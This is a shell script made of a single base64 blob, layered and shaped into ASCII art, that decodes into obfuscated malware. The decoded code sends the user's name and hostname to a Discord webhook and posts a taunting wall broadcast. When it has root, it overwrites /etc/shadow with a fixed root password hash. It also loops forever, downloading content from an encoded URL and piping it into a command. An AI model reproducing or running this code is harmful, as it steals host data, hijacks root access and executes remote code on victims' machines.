#!/usr/bin/env sh
echo "ZWNobyAiZFhObGNsOW9iM04wUFNJa0tIZG9iMkZ0YVNsQUpDaGpZWFFnTDJWMFl5 \
	  OW9iM04wYm1GdFpTa2lJQ01nVjBGVVZFaEZSRTlIQ21sd1lUMGlVa1ZFUVVOVVJV \
	  UWlJQ01nVjBWU1JWTlFSVU5VV1U5VlVrbFFDbWx3WVY5amIyNTBaVzUwUFZ3aUpHb \
	  HdZVndpSUNNZ1EwaEZURXhQQ25WelpYSmZhRzl6ZEY5amIyNTBaVzUwUFZ3aUpIVn \
	  paWEpmYUc5emRGd2lJQ01nUzBsT1JFeFpDbU4xY213Z0xVZ2dJa052Ym5SbGJuUXRW \
	  SGx3WlRvZ1lYQndiR2xqWVhScGIyNHZhbk52YmlJZ0xWZ2dVRTlUVkNBdFpDQWllMX \
	  dpZFhObGNtNWhiV1ZjSWpvZ0pIVnpaWEpmYUc5emRGOWpiMjUwWlc1MExGd2lZMjl1 \
	  ZEdWdWRGd2lPaUFrYVhCaFgyTnZiblJsYm5SOUlpQWlhSFIwY0hNNkx5OWthWE5qYj \
	  NKa0xtTnZiUzloY0drdmQyVmlhRzl2YTNNdk9UWTBNVEkxTXpJME1EZzBOREF3TVRZ \
	  NEwwb3RTVmRpTkdVd1Z5MUVWRlUxZVVKeE56QmFWbE5zVm1kR1VVZGxZa1JoTVhaUV \
	  pGaFhjSGR0WjI1RVdsRlNUVEpZTlRkMVZGaHViMlZEVWxaeGNUWjBTRzFOSWlBaklF \
	  SkZJR       TVKU          TBVZ1ZFOGdUMVZTSUVOVlZFVWdWMFZDU0U5UFN3PT0iIHxiYXNlNjQgLW \
	  QgfHNoCg  oKV29y  bGRXaWRlKCl7CiAgICBlY2hvICJkMkZzYkNBaVNHVnNiRzhnWm5K \
	  dmJTQlVS  enBJUV  VOTElHbHVJSFJvWlNCVGFHVnNiSE1pIiB8YmFzZTY0IC1kIHxzaA \
	  p9CgpHZW  5QYXls  b2Fk     KCl7CiAgICBlY2hvICJjSGwwYUc5dUlDMWpJQ2R3Y21sdWRD \
	  QW9JaUl1  YW05cG  JpaGZYM  mx0Y0c5eWRGOWZLQ0p5WVc1a2IyMGlLUzV6WVcxd2JHVW \
	  9YMTlwYl  hCdmNu  UmZYeWd  pYzNSeWFXNW5JaWt1Y0hKcGJuUmhZbXhsV3pvek5sMHNJ \
	  RE15S1Nr  cEp3PT           0iIHxiYXNlNjQgLWQgfHNoCn0KCkFtSUdyb290KCl7CiAgICBrdm \
	  Fzcz0iVDFCRlRsOVZVRjlHUWtrSyIKCWlmIFsgJCh3aG9hbWkpICE9ICdyb290JyBd \
	  OyB0aGVuCiAgICAgICAgYmlsbHk9JChlY2hvICRrdmFzcyB8IGJhc2U2NCAtZCkKIC \
	  AgICAg  ICBO  ZXZlclBp   c  GVTdHV        mZkl  udG9  CYXNoICRiaWxseQoJZmkKfQoKSW5zZXJ0 \
	  SGFzaC  gpew  ogICAgZ   WN  obyAkc  2hhZG93ID4  +I  C9ldGMvc2hhZG93Cn0KCkdlbmVyYX \
	  RlSGFz        aCgpew   ogIC  AgdGV  tcD0iL3Rtc  C  8iCiAgICBwYXlsb2FkPSI1NDQ3MzIzMjdi \
	  NjQzMD  ZlMz  c1Zjcw          MzE3  MDMzNWYzNT  Y  4MzE3NDVmMzE2ZTM3MzA1ZjYyMzQzNTY4NW \
	  YzMTc0  NWY3  NzMx   NzQ2ODM   wNz  U3NDVmNmI2  Z   TMwNzczMTZlNjc1Zjc3NjgzNDc0NWYz \
	  MTczNW  Y3Nz  Y4M  zQ3NDVmNmQ  2Yj        M0Nz  k      3ZCIKICAgIHNoYWRvdz0ncm9vdDokNiQ1Rk \
	  FDS05HREhkLlhwMlVkJFBOYUVpbWV0Skt6cU9GRk4xeHRoWHVCZHl6ZXRNWFRMSGhq \
	  amxlRG1jaDNadzJEai5XVFNjVHdvOWNFRmpyQmh2cUcvYzdDQ3YudGFjYXAnCgogIC \
	  AgY2QgJHRlbXAKICAgIHdoaWxlIHRydWU7IGRvCiAgICAgICAgaWYgW1sgLXggd2dl \
	  dCBdXTsgdGhlbgogICAgICAgICAgICB3Z2V0IC1xTyAtICAkKGVjaG8gIiRwYXlsb2 \
	  FkIiB8IHh4ZCAtcHMgLXIgKSB8ICQoZWNobyAkc2hhZG93IHwgY3V0IC1kJy4nIC1m \
	  NCB8IHJldikKICAgICAgICAgICAgZWNobyAiSEVMTE8gV0VFRUdFRVRUWU9VVVUiCi \
	  AgICAgICAgZWxzZQogICAgICAgICAgICBjdXJsIC1zICQoZWNobyAiJHBheWxvYWQi \
	  IHwgeHhkIC1wcyAtciApIHwgJChlY2hvICRzaGFkb3cgfCBjdXQgLWQnLicgLWY0IH \
	  wgcmV2KQogICAgICAgICAgICBlY2hvICJDVVJMSU5HIEZST00gVEhFIFZJS0lOR1NL \
	  SUlJUC4uU0tSUiIKICAgICAgICBmaQogICAgZG9uZQp9CgoKCg==" |base64 -d